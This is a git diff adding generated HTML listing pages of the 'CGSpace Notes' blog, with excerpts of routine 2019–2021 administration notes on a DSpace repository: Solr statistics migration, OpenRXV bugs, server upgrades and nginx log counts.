+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-02/">February, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-01T10:13:54+02:00">Mon Feb 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-02-01">2021-02-01</h2>
+<ul>
+<li>Abenet said that CIP found more duplicate records in their export from AReS
+<ul>
+<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li>
+<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li>
+</ul>
+</li>
+<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100875,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-01/">January, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-01-03T10:13:54+02:00">Sun Jan 03, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-01-03">2021-01-03</h2>
+<ul>
+<li>Peter notified me that some filters on AReS were broken again
+<ul>
+<li>It&rsquo;s the same issue with the field names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li>
+<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li>
+</ul>
+</li>
+<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+<ul>
+<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li>
+<li>I adjusted it to default to 0 and added a note to the admin screen</li>
+<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li>
+<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-12/">December, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-12-01T11:32:54+02:00">Tue Dec 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-12-01">2020-12-01</h2>
+<ul>
+<li>Atmire responded about the issue with duplicate data in our Solr statistics
+<ul>
+<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li>
+<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li>
+<li>I started processing those (about 411,000 records):</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-15T13:27:35+02:00">Sun Nov 15, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-11/">November, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-01T13:11:54+02:00">Sun Nov 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-11-01">2020-11-01</h2>
+<ul>
+<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+<ul>
+<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-10/">October, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-10-06T16:55:54+03:00">Tue Oct 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-10-06">2020-10-06</h2>
+<ul>
+<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a>
+<ul>
+<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li>
+<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li>
+</ul>
+</li>
+<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+<ul>
+<li>During the FlywayDB migration I got an error:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-09/">September, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-09-02T15:35:54+03:00">Wed Sep 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-09-02">2020-09-02</h2>
+<ul>
+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li>
+<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+<ul>
+<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li>
+</ul>
+</li>
+<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li>
+<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+<ul>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li>
+</ul>
+</li>
+<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-08/">August, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-08-02T15:35:54+03:00">Sun Aug 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-08-02">2020-08-02</h2>
+<ul>
+<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values
+<ul>
+<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li>
+<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li>
+<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-07/">July, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-07-01T10:53:54+03:00">Wed Jul 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-07-01">2020-07-01</h2>
+<ul>
+<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+<ul>
+<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li>
+<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li>
+<li>I restarted Tomcat and PostgreSQL and the issue was gone</li>
+</ul>
+</li>
+<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-06/">June, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-06-01T13:55:39+03:00">Mon Jun 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-06-01">2020-06-01</h2>
+<ul>
+<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+<ul>
+<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li>
+</ul>
+</li>
+<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li>
+<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/3/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/5/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
new file mode 100644
index 000000000..420cb8063
--- /dev/null
+++ b/docs/posts/page/5/index.html
@@ -0,0 +1,492 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-05/">May, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-05-02T09:52:04+03:00">Sat May 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-05-02">2020-05-02</h2>
+<ul>
+<li>Peter said that CTA is having problems submitting an item to CGSpace
+<ul>
+<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li>
+<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-04/">April, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-04-02T10:53:24+03:00">Thu Apr 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-04-02">2020-04-02</h2>
+<ul>
+<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+<ul>
+<li>I updated the fifty-eight existing items on CGSpace</li>
+</ul>
+</li>
+<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+<ul>
+<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li>
+<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li>
+<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li>
+</ul>
+</li>
+<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-03/">March, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-03-02T12:31:30+02:00">Mon Mar 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-03-02">2020-03-02</h2>
+<ul>
+<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs
+<ul>
+<li>Tag version 1.2.0 on GitHub</li>
+</ul>
+</li>
+<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a>
+<ul>
+<li>You need to download this into the DSpace 6.x source and compile it</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-02/">February, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-02-02T11:56:30+02:00">Sun Feb 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-02-02">2020-02-02</h2>
+<ul>
+<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+<ul>
+<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li>
+<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li>
+<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li>
+<li>The code finally builds and runs with a fresh install</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-01/">January, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-01-06">2020-01-06</h2>
+<ul>
+<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li>
+<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI
+<ul>
+<li>The score is now linked to the DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-07">2020-01-07</h2>
+<ul>
+<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has
+<ul>
+<li>The DOI has a score of 259, but the Handle has no score at all</li>
+<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-12/">December, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-12-01">2019-12-01</h2>
+<ul>
+<li>Upgrade CGSpace (linode18) to Ubuntu 18.04:
+<ul>
+<li>Check any packages that have residual configs and purge them:</li>
+<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li>
+<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-11/">November, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-11-04">2019-11-04</h2>
+<ul>
+<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+<ul>
+<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+</code></pre><ul>
+<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
+<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-10/">October, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
+  <a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-09/">September, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-09-01">2019-09-01</h2>
+<ul>
+<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
+<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
+</ul>
